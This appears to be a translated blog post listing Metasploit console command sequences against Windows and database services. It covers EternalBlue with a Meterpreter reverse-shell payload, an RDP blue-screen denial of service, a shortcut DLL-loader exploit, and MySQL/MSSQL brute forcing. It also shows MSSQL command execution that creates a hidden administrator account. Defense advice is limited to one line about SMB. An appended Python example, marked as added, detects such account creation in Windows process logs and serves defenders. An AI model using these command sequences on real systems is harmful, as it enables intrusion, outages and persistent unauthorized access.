  • Some modules in msfconsole

    EternalBlue (MS17-010):

    [port 445 open]

    use exploit/windows/smb/ms17_010_eternalblue
    
    set payload windows/x64/meterpreter/reverse_tcp
    
    set rhost ip
    
    run

    Defense:
    Disable the SMB service (network file sharing) on port 445
    Enable the firewall and set an inbound rule for connections on port 445


    Blue screen attack (MS12-020):

    [port 3389 open]

    use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
    
    set rhost ip
    
    run


    File sharing (MS10-046):

    use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
    
    set srvhost kaliip
    
    run

     


    MySQL brute-force login:

    Probe:

    use auxiliary/scanner/mysql/mysql_version
    
    set rhosts ip
    
    run


    Login:

    use auxiliary/scanner/mysql/mysql_login
    
    set rhosts ip
    
    set pass_file password.txt
    
    set user_file user.txt
    
    run

    MSSQL:

    Find the MSSQL port:

    use auxiliary/scanner/mssql/mssql_ping
    
    set rhost ip
    
    run


    (You can also use nmap -sV ip, but it does not work well)


    MSSQL brute force:

    use auxiliary/scanner/mssql/mssql_login
    
    set rhost ip
    
    set pass_file password.txt
    
    set rport x
    
    run

    MSSQL command execution (adding an account):

    use auxiliary/admin/mssql/mssql_exec
    
    set rhost ip
    
    set rport
    
    set cmd cmd.exe /c net user test 123 /add
    
    run
    
    set cmd cmd.exe /c net localgroup administrators test /add
    
    run
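
A defender-side view of the MSSQL command-execution step above, as an added example that is not part of the original post: mssql_exec runs its command through SQL Server (xp_cmdshell), so the resulting cmd.exe is a child of sqlservr.exe, which Windows process-creation auditing (Security event 4688) records. The event records, host names and paths below are constructed samples, and the function names are this example's own.

```python
import re

# Fields of Windows Security event 4688 (process creation) used here:
# ParentProcessName, NewProcessName, CommandLine. CommandLine is only
# populated when command-line auditing is enabled by policy.
SQL_PARENT = re.compile(r"\\sqlservr\.exe$", re.I)
SHELL_CHILD = re.compile(r"\\(cmd|powershell|net1?)\.exe$", re.I)
ACCOUNT_CHANGE = re.compile(r"\bnet1?(\.exe)?\s+(user|localgroup)\b.*\s/add\b", re.I)


def classify(event):
    """Return 'high', 'medium' or None for one 4688-style record."""
    if event.get("EventID") != 4688:
        return None
    if not SQL_PARENT.search(event.get("ParentProcessName", "")):
        return None
    if not SHELL_CHILD.search(event.get("NewProcessName", "")):
        return None
    # Any shell under the database engine is unusual; account changes are worse.
    if ACCOUNT_CHANGE.search(event.get("CommandLine", "")):
        return "high"
    return "medium"


def triage(events):
    """Return (severity, host, command line) for every flagged record."""
    hits = []
    for ev in events:
        sev = classify(ev)
        if sev:
            hits.append((sev, ev.get("Computer", "?"), ev.get("CommandLine", "")))
    return hits


# Constructed sample data (not real logs); hosts and paths are made up.
SQLSERVR = r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe"
CMD = r"C:\Windows\System32\cmd.exe"

def make_event(host, parent, cmdline):
    return {"EventID": 4688, "Computer": host, "ParentProcessName": parent,
            "NewProcessName": CMD, "CommandLine": cmdline}

SAMPLE_EVENTS = [
    make_event("db01", SQLSERVR, "cmd.exe /c net user test 123 /add"),
    make_event("db01", SQLSERVR, "cmd.exe /c net localgroup administrators test /add"),
    make_event("db02", SQLSERVR, r"cmd.exe /c dir D:\backup"),
    make_event("ws07", r"C:\Windows\explorer.exe", "cmd.exe /c net user audit1 x /add"),
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit)
```
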
  • Original article: https://www.cnblogs.com/f1veseven/p/13577268.html